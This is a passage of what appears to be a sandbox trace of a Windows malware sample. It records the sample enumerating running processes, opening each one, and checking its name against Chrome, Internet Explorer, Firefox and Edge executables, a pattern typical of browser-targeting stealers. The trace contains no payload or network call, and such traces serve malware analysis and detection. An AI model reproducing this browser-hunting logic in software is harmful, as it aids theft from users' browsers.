	[0225.772] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.772] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.772] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.772] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0225.772] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.772] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.773] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0225.773] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x5d54
	[0225.774] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.774] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0225.774] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.774] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.774] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.774] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0225.775] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.775] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.775] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0225.776] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5d58
	[0225.776] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.776] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0225.777] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.777] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.777] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.777] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0225.777] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.777] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.778] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0225.778] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x5d5c
	[0225.778] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.779] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0225.779] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.779] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.779] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.780] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0225.780] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.780] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.780] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0225.781] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x5d60
	[0225.781] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.781] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0225.782] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.782] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.782] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.782] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0225.782] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.782] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.782] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0225.783] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x5d64
	[0225.783] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.783] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0225.784] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.784] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.784] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.784] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0225.784] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.784] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.785] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0225.785] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x5d68
	[0225.785] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.786] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0225.786] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.786] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.786] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.786] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0225.786] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.787] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.787] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0225.787] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x5d6c
	[0225.788] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.788] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0225.788] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.788] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.788] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.788] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0225.789] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.789] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.789] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0225.790] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x5d70
	[0225.790] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.790] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0225.790] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.790] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.790] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.790] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0225.791] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.791] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.791] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0225.792] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x5d74
	[0225.792] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.792] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0225.792] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.792] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.792] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.792] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0225.793] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.793] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.793] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0225.794] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x5d78
	[0225.794] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.794] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0225.794] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.794] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.794] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.794] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0225.795] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.795] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.798] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0225.798] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0225.798] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0225.799] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x5d7c
	[0225.799] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.799] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0225.800] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.800] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.800] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.801] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0225.801] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.801] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.802] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0225.802] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x5d80
	[0225.802] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.802] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0225.803] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.803] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.803] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.803] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0225.803] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.803] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.804] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0225.804] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x5d84
	[0225.804] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.804] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0225.805] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.805] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.805] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.805] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0225.805] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.805] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.806] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0225.806] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x5d88
	[0225.807] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.807] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0225.807] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.807] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.807] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.807] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0225.808] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.808] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.808] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0225.809] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x5d8c
	[0225.809] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.809] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0225.809] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.809] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.810] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.810] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0225.810] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.810] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.811] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0225.812] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x5d90
	[0225.812] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.812] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0225.812] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.812] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.812] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.812] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0225.813] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.813] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.813] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0225.814] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x5d94
	[0225.814] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.814] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0225.814] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.814] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.815] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.815] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0225.815] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.815] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.815] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0225.816] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x5d98
	[0225.816] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.816] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0225.817] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.817] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.817] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.817] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0225.818] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.818] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.818] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0225.819] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x5d9c
	[0225.819] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.819] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0225.819] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.819] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.819] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.819] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0225.820] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.820] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.820] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0225.821] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x5da0
	[0225.821] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.821] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0225.821] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.821] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.821] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.821] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0225.821] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.822] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.822] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0225.822] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x5da4
	[0225.823] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.823] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0225.823] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.823] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.823] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.824] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0225.824] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.824] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.824] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0225.825] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x5da8
	[0225.825] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.825] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0225.826] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.826] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.827] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.827] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0225.827] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.827] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.828] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0225.829] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x5dac
	[0225.829] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.829] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0225.829] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.829] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.830] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.830] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0225.830] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.830] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.831] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0225.831] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x5db0
	[0225.831] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.831] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0225.832] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.832] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.833] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
